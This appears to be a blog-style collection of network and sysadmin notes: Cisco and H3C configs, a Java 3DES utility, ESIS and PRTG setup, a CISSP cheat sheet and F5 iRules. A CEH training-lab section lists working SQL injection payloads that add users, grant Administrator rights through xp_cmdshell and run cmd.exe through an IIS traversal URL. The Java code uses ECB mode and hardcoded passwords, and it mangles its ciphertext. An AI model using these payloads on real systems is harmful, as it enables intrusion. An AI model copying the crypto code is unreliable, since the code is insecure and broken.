Cisco Catalyst 2960 Configuration To Support Avaya IP Phone

Configuration of Cisco 2960 Switch When Connected to Avaya IP Phone and PC

Data VLAN = 80

Voice VLAN = 2

Uplink port configuration for Etherchannel & Trunking for between Cisco 2960 to Avaya Switch

interface Port-channel1
switchport trunk allowed vlan 2,80
switchport mode trunk
spanning-tree bpdufilter enable

interface GigabitEthernet1/0/23
switchport trunk allowed vlan 2,80
switchport mode trunk
no cdp enable
channel-group 1 mode on
!
interface GigabitEthernet1/0/24
switchport trunk allowed vlan 2,80
switchport mode trunk
no cdp enable
channel-group 1 mode on

Access port configuration for Avaya IP Phone port

interface GigabitEthernet1/0/33
switchport access vlan 80
switchport mode access
switchport voice vlan 2
speed 100
duplex full
mls qos trust cos
no cdp enable
spanning-tree portfast

3DES Data Encryption

The keystore type is: JCEKS
The padding mode is: PKCS5Padding

package com.FRNX.base.util;

import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.security.InvalidKeyException;
import java.security.KeyStore;
import java.security.KeyStoreException;
import java.security.NoSuchAlgorithmException;
import java.security.Security;
import java.security.UnrecoverableEntryException;
import java.security.cert.CertificateException;
import java.util.ResourceBundle;

import javax.crypto.BadPaddingException;

import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.SecretKey;
import com.FRNX.arch.exception.FRNXException;

/**
* This class has the following functions:
* 1. Loads or generates key store.
* 2. Loads or generates symmetric secret key from or to the specified key store.
* 3. Encrypt data by 3DES.
*
* When encrypt data by 3DES, just call the public method: "encryptDataBy3DES".
* For example:
* String ciperText = FRNXSecurityUtil.encryptDataBy3DES(plainText);
*/
public class FRNXSecurityUtil
{
private static final String keyStoreFilePath;
private static final String CIPHER_ALGORITHM_3DES = "DESede";
private static final String CIPHER_KEYSTORE_TYPE = "JCEKS";
private static final String CIPHER_KEYSTORE_PASSWORD = "********";
private static final String CIPHER_3DESKEY_PASSWORD = "********";
private static final String CIPHER_3DESKEY_ALIAS = "3DESKey";
private static final int CIPHER_3DESKEY_SIZE = 168;
private static final String CIPHER_TRANSFORMATION = "DESede/ECB/PKCS5Padding";
private static final int CIPHER_ENCRYPT_MODE = Cipher.ENCRYPT_MODE;

static
{
ResourceBundle resourceBundle = ResourceBundle.getBundle("FRNXSecurity");
keyStoreFilePath = resourceBundle.getString("FRNX.keystore.location");
}

/**
* Load the secret key from the key store file.
* The key store file is configured in the "FRNXSecurity.properties".
* If the key store file exists, retrieve the secret key;
* otherwise generate the secret key and key store file, store the secrete key in the key store.
* @return - Secret key which is generated or retrieved from the key store file.
* @throws FRNXException
*/
private static SecretKey loadSecretKeyFromKeyStore() throws FRNXException
{
SecretKey DESedeKey = null;
File keyStoreFile = new File(keyStoreFilePath);
FileInputStream keyStoreFileInput = null;
FileOutputStream keyStoreFileOutput = null;

try
{
char[] keyStorePassword = CIPHER_KEYSTORE_PASSWORD.toCharArray();
KeyStore keyStoreInstance = KeyStore.getInstance(CIPHER_KEYSTORE_TYPE);
KeyStore.PasswordProtection passwordProtectionInstance = new KeyStore.PasswordProtection(CIPHER_3DESKEY_PASSWORD.toCharArray());

/*Retrieve the secret key from the key store file if the file exists.*/
if(keyStoreFile.exists())
{
keyStoreFileInput = new FileInputStream(keyStoreFile);
keyStoreInstance.load(keyStoreFileInput, keyStorePassword);
KeyStore.SecretKeyEntry DESedeKeyEntry = (KeyStore.SecretKeyEntry)keyStoreInstance.getEntry(CIPHER_3DESKEY_ALIAS, passwordProtectionInstance);
DESedeKey = DESedeKeyEntry.getSecretKey();
}
/*Generate the key store file and the secret key and store the key in the key store file.*/
else
{
keyStoreInstance.load(null, null);
KeyGenerator keyGeneratorInstance = KeyGenerator.getInstance(CIPHER_ALGORITHM_3DES);
keyGeneratorInstance.init(CIPHER_3DESKEY_SIZE);
DESedeKey = keyGeneratorInstance.generateKey();
KeyStore.SecretKeyEntry DESedeKeyEntry = new KeyStore.SecretKeyEntry(DESedeKey);
keyStoreInstance.setEntry(CIPHER_3DESKEY_ALIAS, DESedeKeyEntry, passwordProtectionInstance);
if(!keyStoreFile.getParentFile().exists())
{
keyStoreFile.getParentFile().mkdirs();
}
keyStoreFileOutput = new FileOutputStream(keyStoreFile);
keyStoreInstance.store(keyStoreFileOutput, keyStorePassword);
}
}
catch(KeyStoreException e)
{
throw new FRNXException(e.getMessage(), e);
}
catch(FileNotFoundException e)
{
throw new FRNXException(e.getMessage(), e);
}
catch(IOException e)
{
throw new FRNXException(e.getMessage(), e);
}
catch(CertificateException e)
{
throw new FRNXException(e.getMessage(), e);
}
catch(NoSuchAlgorithmException e)
{
throw new FRNXException(e.getMessage(), e);
}
catch(UnrecoverableEntryException e)
{
throw new FRNXException(e.getMessage(), e);
}
finally
{
try
{
if(keyStoreFileInput != null)
{
keyStoreFileInput.close();
}
if(keyStoreFileOutput != null)
{
keyStoreFileOutput.close();
}
}
catch(IOException e)
{
throw new FRNXException(e.getMessage(), e);
}
}
return DESedeKey;
}

/**
* Encrypt the plain text by the 3DES algorithm.
* @param plainText - The data to be encrypted.
* @return - The encrypted data.
* @throws FRNXException
*/
public static String encryptDataBy3DES(String plainText) throws FRNXException
{
String cipherText = null;
try
{
Cipher cipherInstance = Cipher.getInstance(CIPHER_TRANSFORMATION);
SecretKey DESedeKey = loadSecretKeyFromKeyStore();
cipherInstance.init(CIPHER_ENCRYPT_MODE, DESedeKey);
byte[] plainTextBytes = plainText.getBytes();
byte[] cipherTextBytes = cipherInstance.doFinal(plainTextBytes);
cipherText = new String(cipherTextBytes);

}
catch(NoSuchPaddingException e)
{
throw new FRNXException(e.getMessage(), e);
}
catch(NoSuchAlgorithmException e)
{
throw new FRNXException(e.getMessage(), e);
}
catch(InvalidKeyException e)
{
throw new FRNXException(e.getMessage(), e);
}
catch(BadPaddingException e)
{
throw new FRNXException(e.getMessage(), e);
}
catch(IllegalBlockSizeException e)
{
throw new FRNXException(e.getMessage(), e);
}

return cipherText;
}
}

Cisco Catalyst 4500 Supervisor LED Status Orange And In Continuous Boot Loop

Cisco Cat4500 switch is in boot loop and restart itself in random interval (every 3 hrs, 1hrs, 1day). A check on sup displayed LED status is orange

FRNX4500-CORE#show environment status
Power Fan Inline
Supply Model No Type Status Sensor Status
------ ---------------- --------- ----------- ------- -------
PS1 PWR-C45-1000AC AC 1000W good good n.a.
PS2 PWR-C45-1000AC AC 1000W bad/off bad/off n.a.

Power supplies needed by system : 1
Power supplies currently available : 1

Chassis Type : WS-C4506

Power consumed by backplane : 0 Watts

Supervisor Led Color : Orange

Module 1 Status Led Color : Orange
Module 2 Status Led Color : Green
Module 3 Status Led Color : Green
Module 4 Status Led Color : Green
Module 5 Status Led Color : Green

Fantray : good

A show on diagnostic result demonstrate the sup is in normal state

FRNX4500-CORE#show diagnostic result module 1

module 1:

Overall diagnostic result: PASS

Test results: (. = Pass, F = Fail, U = Untested)

1) supervisor-bootup ---------------> .
2) packet-memory-bootup ------------> .
3) packet-memory-ongoing -----------> U

However, a check on module display power failure issue

Chassis Type : WS-C4506

Power consumed by backplane : 0 Watts

Mod Ports Card Type Model Serial No.
---+-----+--------------------------------------+------------------+-----------
1 2 1000BaseX (GBIC) Supervisor(active) WS-X4013+ JAE********
2 6 1000BaseX (GBIC) WS-X4306-GB JAE********
3 32 10/100BaseTX (RJ45) WS-X4232-RJ-XX JAE********
4 32 10/100BaseTX (RJ45) WS-X4232-RJ-XX JAE********
5 32 10/100BaseTX (RJ45) WS-X4232-RJ-XX JAE********

M MAC addresses Hw Fw Sw Status
--+--------------------------------+---+------------+----------------+---------
1 ****.59e5.1a40 to 0017.59e5.1a41 4.1 12.2(20r)EW1 12.2(18)EW5 Ok
2 ****.9dd4.5276 to 0016.9dd4.527b 4.1 Ok
3 ****.9d1a.4220 to 0016.9d1a.424f 1.9 Ok
4 ****.d742.0260 to 000e.d742.028f 1.9 Ok
5 ****.946a.bf90 to 0017.946a.bfbf 1.9 Ok

System Failures:
----------------
Power Supply: bad/off (see 'show power')

Checked on the Cisco database and confirmed that the amber light is because of bad PEM - Power Module

As for the Boot Loop, show bootvar found that the boot flash is missing. This might due to improper reboot on the switch

FRNX4500-CORE#show bootvar
BOOT variable does not exist
CONFIG_FILE variable does not exist
BOOTLDR variable does not exist
Configuration register is 0x2101

Assign boot image and change the config register from 0x2101 to 0x2102

FRNX4500-CORE#configure terminal
FRNX4500-CORE(config)#boot system flash bootflash:cat4000-i9s-mz.122-18.EW5.bin
FRNX4500-CORE(config)#config-register 0x2102

ESIS Installation on SUSE

Check Version

FRNX:~ # cat /proc/version
Linux version 2.6.16.21-0.8-bigsmp (geeko@buildhost) (gcc version 4.1.0 (SUSE Linux)) #1 SMP Mon Jul 3 18:25:39 UTC 2006

Install Java (JRE) version 1.5.x.)

FRNX:/usr # md /usr/java
chmod a+x jre-1_5_0_22-linux-i586.bin
./jre-1_5_0_22-linux-i586.bin

Set JAVA_HOME Path

FRNX:~ # vi ~/.bashrc
JAVA_HOME=/usr/bin/java/jre1.5.0_22
export JAVA_HOME
PATH=$PATH:$JAVA_HOME/bin
export PATH

Enable/Verify Java

FRNX:~ # which java
/usr/bin/java/jre1.5.0_22/bin/java

FRNX:/usr/java # java -version
java version "1.5.0_22"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_22-b03)
Java HotSpot(TM) Server VM (build 1.5.0_22-b03, mixed mode)

Add ESIS Directory,Group and User

FRNX:/opt # mkdir /opt/ESIS
ESIS User & Group
FRNX:/opt # groupadd esisgp
FRNX:/opt # useradd -c 'ESIS user' -D esisgp -d /opt/ESIS esis
FRNX:/opt # chown -R esis:esisgp /opt/ESIS
FRNX:/opt # chmod 755 /opt/ESIS

Login as ESIS User

FRNX: su -l esis

Untar ESIS

esis@FRNX:~> tar xf ESIS_1_0_1-Linux-2.6.16.46-0.12-default-20100419-15h12.tar.gz

Define JAVA_HOME on ESIS

FRNX:~ # vi /opt/ESIS/bin/esis_env
JAVA_HOME=/usr/bin/java/jre1.5.0_22/bin/java; export JAVA_HOME

Install ESIS

esis@FRNX:~> /opt/ESIS/bin/esis_install
esis@FRNX:~> /opt/ESIS/bin/esis_startup
esis@FRNX:~> /opt/ESIS/bin/esis_integrate_lang /opt/ESIS/share/ESIS/lang

Company Creation

esis@FRNX:~> /opt/ESIS/bin/esis companies add FRNX FRNX
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

You are about to add a company :
Company name: FRNX
Short name: FRNX
Connection url: null
Connection username: null
***** WARNING ******
YOU ARE ABOUT TO CHANGE OR ADD A USER OR COMPANY
THIS COULD DISRUPT THE ACCESS TO THE APPLICATION FOR
CERTAIN USERS OR GRANT ACCESS TO ACCESS TO UNAUTHORIZED
PERSONS.

PLEASE CONFIRM THAT YOU WANT TO PROCEED : y/n >y
A new company has been created : FRNX
in 0:0:2:337

Add Company Domain

esis@FRNX:~> /opt/ESIS/bin/esis companies add_domain_name FRNX frnx.com.my
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

You are about to add a domain name to a company :
Company name: FRNX
***** WARNING ******
YOU ARE ABOUT TO CHANGE OR ADD A USER OR COMPANY
THIS COULD DISRUPT THE ACCESS TO THE APPLICATION FOR
CERTAIN USERS OR GRANT ACCESS TO ACCESS TO UNAUTHORIZED
PERSONS.

PLEASE CONFIRM THAT YOU WANT TO PROCEED : y/n >y
Domain gitn.com.my was added for company FRNX
in 0:0:2:670

Set Company As Default

esis@FRNX:~> /opt/ESIS/bin/esis prefs set com.entelience.esis.defaultCompany
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Please enter the value : >
FRNX
***** WARNING ******
YOU ARE ABOUT TO CHANGE AN APPLICATION PROPERTY
THIS COULD HAVE UNEXPECTED RESULTS LIKE
MAKING THE APPLICATION UNSTABLE OR UNUSABLE

PLEASE CONFIRM THAT YOU WANT TO PROCEED. y/n >y
Property [com.entelience.esis.defaultCompany] has been set to [FRNX]
in 0:0:9:474

Admin User Creation

esis@FRNX:~> /opt/ESIS/bin/esis users add adzril GITN
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Please enter new password : >
*********
Please enter new password again : >
*********
You are about to add a user :
User name: adzril
Company: FRNX
E-mail: null
First name: null
Last name: null
Phone: null
Location: null
***** WARNING ******
YOU ARE ABOUT TO CHANGE OR ADD A USER OR COMPANY
THIS COULD DISRUPT THE ACCESS TO THE APPLICATION FOR
CERTAIN USERS OR GRANT ACCESS TO ACCESS TO UNAUTHORIZED
PERSONS.

PLEASE CONFIRM THAT YOU WANT TO PROCEED : y/n >y
in 0:0:18:271

Modules Config

esis@FRNX:~>esis@FRNX:~> /opt/ESIS/bin/esis modules synchronize
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Synchronizing modules
Updating version
Synchronization successfull
in 0:0:0:387

List All Modules

esis@FRNX:~> /opt/ESIS/bin/esis modules list_all
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

All modules:
Class Name Full Name
-----------------------------------------+-----------------------------------------------
com.entelience.module.Admin | ESIS Administration
com.entelience.module.Assets | Assets Process Management
com.entelience.module.Audit | Risks Audit Management
com.entelience.module.IdentityManagement | Identities Process Management
com.entelience.module.Portal | Governance, Compliance and Risks consolidation
com.entelience.module.RiskAssessment | Risk Assessment Review
com.entelience.module.RiskModelisation | Risk Register
com.entelience.module.Vulnerabilities | Vulnerabilities Process Management
-----------------------------------------+-----------------------------------------------
in 0:0:0:396

Register Modulesn

esis@FRNX:~> /opt/ESIS/bin/esis modules register com.entelience.module.Admin
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Registering module com.entelience.module.Admin
Module com.entelience.module.Admin successfully registered
in 0:0:0:360
esis@FRNX:~> /opt/ESIS/bin/esis modules register com.entelience.module.Assets
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Registering module com.entelience.module.Assets
Module com.entelience.module.Assets successfully registered
in 0:0:0:341

Activate Modules

esis@FRNX:~> /opt/ESIS/bin/esis modules activate com.entelience.module.Assets
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Activating module com.entelience.module.Assets
Enter the value for parameter : com.entelience.esis.feature.hideNewProduct
description :
default value : [false]
Press Return to use default value
>
Enter the value for parameter : com.entelience.esis.feature.hideNewVendor
description :
default value : [false]
Press Return to use default value
>
Module com.entelience.module.Assets successfully activated

Paessler PRTG - Monitoring WMI sensors (Error 80070005)

WMI monitoring often fails with the following error “Connection could not be established (80070005: Access Denied …)”

Basic Steps

- First of all, please check if the correct credentials are used, especially if the hostname is entered in the field “Domain or Computer Name” in PRTG. Please do not leave this field empty!

- Also verify if any firewalls in between PRTG and the target machine(s) may be interfering with connections on port 135.

- The next thing you should try is to configure the PRTG Probe service to run under a domain administrator account. Sometimes the access rights of the System Account under which the PRTG Probe runs by default are not sufficient.

Next options have to be differentiated by the Windows version running on the target machine

Windows XP/2003
- Start the registry editor (regedit)

- Navigate to key: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\
- Make sure that “ForceGuest” is set to “0”

- Reboot

Windows Vista/2008 (R2)
- Open the control panel, head to the Windows firewall
- Click on “Change Settings” and then please select the “Exceptions” tab
- Select the check box for “Windows Management Instrumentation (WMI)”
- Open a command prompt (as administrator) and enter the following line to set another firewall group rule

- netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes

- Reboot

Windows 7
- Open Windows Firewall
- Click on “Advanced Settings” and then, for both Inbound and Outbound Rules
- Select all checkboxes for “Windows Management Instrumentation”
- Open a command prompt (as administrator) and enter the following line to set another firewall group rule

netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes

- Reboot

CISSP Cheat Sheet

Common Criteria
EAL measures how the needs are met
Protection Profiles – describe objectives, and the environmental, functional, and assurance level expectations
Target of Evaluation (TOE) – Product proposed to provide the needed security solution
Security Target – Written by vendor explaining mechanisms that meet security and assurance requirements
Evaluated Products List EPL- list of evaluated products

EAL 1 Functionally tested
EAL 2 Structurally tested
EAL 3 Methodically tested and checked
EAL 4 Methodically designed, tested, and reviewed
EAL 5 Semiformally designed and tested
EAL 6 Semiformally verified design and tested
EAL 7 Formally verified design and tested

(FSMSF - T/TC/TD/TDV :Test/Test-Check/Test-Design/Test-Design-Verified)

EAL measures how the needs are met
Protection Profiles – describe objectives, and the environmental, functional, and assurance level expectations
Target of Evaluation (TOE) – Product proposed to provide the needed security solution
Security Target – Written by vendor explaining mechanisms that meet security and assurance requirements
Evaluated Products List (EPL)- list of evaluated products

Risk Analysis

ALE = ARO x SLE
SLE = AV x EF

Bell-LaPadula (MAC)
NO WRITE DOWN
NO READ UP
USER<=File to write

Biba (Integrity)
NO WRITE UP
NO READ DOWN
USER =>File to Write

Symmetric Encryption
Notation: w/r/b (data/round/key size)
DES: 64(56+8) / 16 / 64(56+8)
3DES : 64(56+8) / 48 / 64(56+8)
AES : 128,192,256 / 10,12,14 / 128,192,256
IDEA : 64 / 8 / 128
Blowfish : 64 /16 / 32-448
RC5 : 32,64,128 / 255 / 0-2048

Asymmetric Encryption
Diffie-Hellman
- vulnerable to man-in-the-middle attack
- discreet algorithm in finite field
- no auth
RSA
- factoring product of 2 prime number
- encryption + digital signature
- one way function
El-Gamal
- digital signature + encryption + key exchange
- discreet algorithm in finite field
- performance : the slowest
Elliptic Curve Crypto (ECC)
- digital signature + encryption + secure key distribution
- more effective than RSA
- discreet algorithm on elliptic curve
Knapsack
-based on knapsack problem,insecure,not in use

TCSEC

D - Minimal Protection

C1 - Discretionary Security Protection (DAC)

C2 - Controlled Access Protection (login process)

B1 - Labeled Protection (Labels and MAC)

B2 - Structured Protection (Covert channel storage analysis, Security model defined & documented)

B3 - Security Domains (Reference monitor, Automated intrution detection & response, covert timing channels)

A1 - Verified Design

NIC Teaming LinkedTo Stacked Switch

Multiple switches, when connected using the stack cable, are one logical device. This will gives you two separate switches that you can configure with the same channel group and if one switch fails, you still have that other

Configuring Manual Aggregation Group
A manual aggregation group is manually created. All its member ports are manually added and can be manually removed (it inhibits the system from automatically adding/removing ports to/from it). Each manual aggregation group must contain at least one port. When a manual aggregation group contains only one port, you cannot remove the port unless you remove the whole aggregation group.

LACP is disabled on the member ports of manual aggregation groups, and enabling LACP on such a port will not take effect.

system-view
System View: return to User View with Ctrl+Z.
[furynax] link-aggregation group 1 mode manual
[furynaxlink-aggregation group 1 description Link Aggregation for Server Teaming
[furynax] interface GigabitEthernet1/0/1
[furynax-GigabitEthernet1/0/1] port link-aggregation group 1
[furynax-GigabitEthernet1/0/1] interface GigabitEthernet2/0/1
[furynax-GigabitEthernet2/0/1] port link-aggregation group 1

Display and Maintain Link Aggregation Configuration

[furynax] display link-aggregation summary

JuggyBank SQL Injection Mini Lab Demo

This Lab depends on the "juggybank" website that comes with the CEH courseware with SQL server installed on the target machine. These are simple examples of SQL injection attacks, but if they work, almost any SQL statement will also. If the database is something other than SQL Server than only the syntax of the SQL statements will change, but the basis for the attack is actually in the weak asp scripts used for the juggybank login

Hack Script
Point your browser to the juggybank site. Enter a single tick into the username field or address bar. If an page is returned that access is denied or CGI error" then you are in business.

Paste this at username field. It will create new user 'furynax' with password 'loop' at the app level.

';insert into userinfo values('furynax','loop')--

Paste this at the address bar to create user furynax at OS level with normal user privilege

';exec master..xp_cmdshell 'net user /add furynax loop';--

Use this command at browser address bar to assign user furynax with Administrator privilege

';exec master..xp_cmdshell 'net localgroup Administrators /add furynax loop';--

Paste this command at address bar to Explore C: drive of the victim machine. Similarly, you can use mkdir or other native MS-DOS command.The only real limits are your skill and imagination using it

http://(victim ip)/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

IxChariot High Performance Throughput Script

IxChariot is a test tool for simulating applications and assessing network performance. This script emulates sending a file from Endpoint 1 to Endpoint 2, and getting a confirmation back. The default file size is 100,000 bytes.

Endpoint 1                                 Endpoint 2
----------                                 ----------
SLEEP                                       
initial_delay=0
CONNECT_INITIATE                           CONNECT_ACCEPT                              
source_port=AUTO                            destination_port=AUTO                     
0                                           0                                         
0                                           0                                         
LOOP                                       LOOP                                        
number_of_timing_records=100                number_of_timing_records=100              
START_TIMER                               
LOOP                                        LOOP                                      
transactions_per_record=1                   transactions_per_record=1               
SEND                                        RECEIVE                                 
file_size=10000000                           file_size=10000000                    
send_buffer_size=65535                       receive_buffer_size=65535             
send_datatype=NOCOMPRESS              
send_data_rate=UNLIMITED              
CONFIRM_REQUEST                             CONFIRM_ACKNOWLEDGE                     
INCREMENT_TRANSACTION                   
END_LOOP                                    END_LOOP                                  
END_TIMER                                 
SLEEP                                     
transaction_delay=0
END_LOOP                                   END_LOOP                                    
DISCONNECT                                 DISCONNECT                                  
close_type=Reset                           close_type=Reset                     

JSessionID-Based Persistence

Universal Persistence

BIG-IP LTM software includes the Universal Inspection Engine (UIE). The UIE is a set of functions that allows you to direct and persist load-balanced traffic using iRules. Universal persistence uses the UIE which allows you to use persistence for sessions based on content data, or based on connections to a specific pool member, by defining a sequence of bytes in the connection to use as a session identifier.

iRule Example

The following iRule example illustrates how the LTM can find a cookie called FURYNAX in the first response from the server and add a persistence record for that cookie. Subsequent client requests containing the same cookie will persist to the same pool member.

when CLIENT_ACCEPTED {
set add_persist 1
}
when HTTP_RESPONSE {
if { [HTTP::cookie exists "FURYNAX"] and $add_persist } {
persist add uie [HTTP::cookie "FURYNAX"]
set add_persist 0
}
}

when HTTP_REQUEST {
if { [HTTP::cookie exists "FURYNAX"] } {
persist uie [HTTP::cookie "FURYNAX"]
} else {
set jsess [findstr [HTTP::uri] "FURYNAX" 13 ";"]
if { $jsess != "" } {
persist uie $jsess
}
}
}

Another iRules examples

when CLIENT_ACCEPTED {
set add_persist 1
}

when HTTP_RESPONSE {
if { [HTTP::cookie exists "CSPSESSIONID-SP-57772-UP-csp-sys-"] and $add_persist } {
persist add uie [HTTP::cookie "CSPSESSIONID-SP-57772-UP-csp-sys-"]
set add_persist 0
}
}

when HTTP_REQUEST {
if { [HTTP::cookie exists "CSPSESSIONID-SP-57772-UP-csp-sys-"] } {
persist uie [HTTP::cookie "CSPSESSIONID-SP-57772-UP-csp-sys-"]
} else {
set jsess [findstr [HTTP::uri] "CSPSESSIONID-SP-57772-UP-csp-sys-" 34 ";"]
if { $jsess != "" } {
persist uie $jsess
}
}
}

when CLIENT_ACCEPTED {
set add_persist 1
}

when HTTP_RESPONSE {
if { [HTTP::cookie exists "JSESSIONID"] and $add_persist } {
persist add uie [HTTP::cookie "JSESSIONID"]
set add_persist 0
}
}

when HTTP_REQUEST {
if { [HTTP::cookie exists "JSESSIONID"] } {
persist uie [HTTP::cookie "JSESSIONID"]
} else {
set jsess [findstr [HTTP::uri] "JSESSIONID" 11 ";"]
if { $jsess != "" } {
persist uie $jsess
}
}
}

Validate Persistence Records

[root@ltm1:Active] config # b persist show all
PERSISTENT CONNECTIONS --
Mode: universal Value: nVTLLvHDy9GQJQ4T29LPwsLqXXCB2pTGJ3KR49WhpvvBwZyPrxQT!-167612729!-671022569
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 231sec

Mode: source addr Value: 10.21.33.39
Virtual: 10.251.3.145:https Node: 10.251.44.5:any Age: 12sec

Mode: universal Value: Cn18LvHQR8dyZH1S1BmnSxVGcDMvHz12JlTFnJFryvKZpgrrTBdZ!-167612729!-671022569
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 288sec

Mode: universal Value: G4JbLvHXFg2LrXnz71hyJWBGLgT7fQXJbw4G5nhvFThh2pDfymLY!-671022569!-167612729
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 188sec